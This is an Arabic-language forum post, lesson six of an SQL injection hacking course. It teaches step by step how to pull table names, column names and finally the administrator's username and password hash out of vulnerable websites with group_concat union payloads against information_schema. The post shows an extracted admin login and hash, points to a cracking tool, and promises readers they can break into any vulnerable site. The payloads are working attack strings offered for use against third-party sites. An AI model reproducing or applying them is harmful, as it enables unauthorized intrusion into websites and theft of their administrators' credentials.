{الدرس السادس} استخراج الجداول والعواميد باستخدام ()group_concat واستخراج بيانات الادمن
السلام عليكم ورحمة الله وركاته
============================
دورة احتراف
SQL Injection
مقدمة من قبل الهكر الجزائري
Mohamed10060
الدرس الثالث من الدورة
^_^
استخراج الجداول والعواميد باستخدام
()group_concat
واستخراج بيانات الادمن
===========================
اليوم درسنا مهم جدا
وهو استخراج كافة الجداول والعواميد الموجودة بقاعدة البيانات
واستخراج بيانات الادمن
نبدأ درسنا بعون الله
=================
اولاا: نقوم بفتح الموقع المصاب ثم نضع مكان العامود المصاب
كود:
group_concat(table_name)
وفي نهاية الرابط
كود:
+from+information_schema.tables+where+table_schema=database()--
بحيث يصبح الرابط كما بهذه الصورة
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]وبما ان الصورة مش كاملة دا الرابط كامل
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]طيب الأن نفتح الرابط ونشوف اذا ظهرت الجداول
تمام ظهرت لنا جميع الجداول
ال يهمنا هو
جدول الـ
admin
لان هو بيحوي عامود اليوزر وعامود الباس مدير الموقع
طيب نحفظ اسم الجدول admin
والان نأتي الى استخارج العواميد
نقوم بتبديل بالرابط هو بتغير
كلمة
table_name
الى
column_name
والامر
information_schema.tables
الى
information_schema.columns
واذا ما عرفت تعدل اعمل مثل الي بالصورة
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]طيب اكيد راح تسألوا ليش بدلنا كلمة
table
بكلمة
column
الجواب
عندما وضعنا كلمة table طلبنا استخراج الجداول وعندما وضعنا كلمة column طلبنا استخراج العواميد
طيب الان نفتح الرابط ونشوف العواميد
تمام ظهرت لنا العواميد
ال يهمني فيهم هو عامود
username
وعامود
password
وانتبهو ان بين كل عامود والأخر فاصلة
طيب الان عرفنا اسم جدول الباس واليوزر وهو admin وعرفنا اسماء عامود الباس وعامود اليوزر واليوزر
وهو username و password
طيب الان ايه بدنا نعمل
حنستخرج بيانات الادمن
الان نقوم بحذف
كود:
+information_schema.tables+where+table_schema=database()--
ونضع بدلها
admin
يعني بيصير الامر بنهاية الرابط هكذا
كود:
+from+admin--
ونقوم بتعديل
كود:
group_concat(column_name)
الى
كود:
group_concat(username,0x3a,password)
وهذه صورة توضح
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]بعد التعديل اضفنا الى نهاية الرابط
اسم جدول الادمن وكل واحد يغيره حسب اسم جدول الادمن الموجود بالموقع ال مستهدفه
وقمنا بتعديل
column_name
الى
username,0x3a,password
username:هذه يوجد به يوزر مدير الموقع
password:وهذا يوجد به باسوورد مدير الموقع
0x3a:وهذه تفصل بين اليوزر والباس
طيب الان نفتح الرابط بعد التعديل ونشوف بيانات الادمن
تمام ظهر لنا اليوزر والباس لمدير الموقع
fares
هذا اليوزر
b6c8248b03cb0d3b3f2bb1ac1da66f60
وهذ الباس
ولكنه مشفر للاسف
وهنالك طرق عديدة لفك التشفير
وايضا تستطيع فك التشفير عن طريق برنامج الهافيج
فاعلم اننا لن نستطيع دخول اللوحة ال لفك تشفيرة
وهنالك شروحات كثيرة لفك التشفير
واذا فهمتواهذا الدرس وفهمتوالدروس السابقة اعلموا ان باستطاعتكم اختراق اي موقع
مصاب ولكن قد تواجهكم بعض الحمايات ولن انهي الدورة ال بعداضافة كم درس اخر لتخطي الحمايات
وان شاء الله الى مركز معي انا متاكد انو راح يصير يخترق اي موقع مصاب
===========================
فهذه تكون نهاية الدرس السادس من الدورة ارجو ان يكون الدرس واضح ومفهوم ولي عندو اي استفسار يضعه في هذا الموضوع
الى اللقاء في درس اضافي للدورة
اخوكم في الله
Mohamed10060
.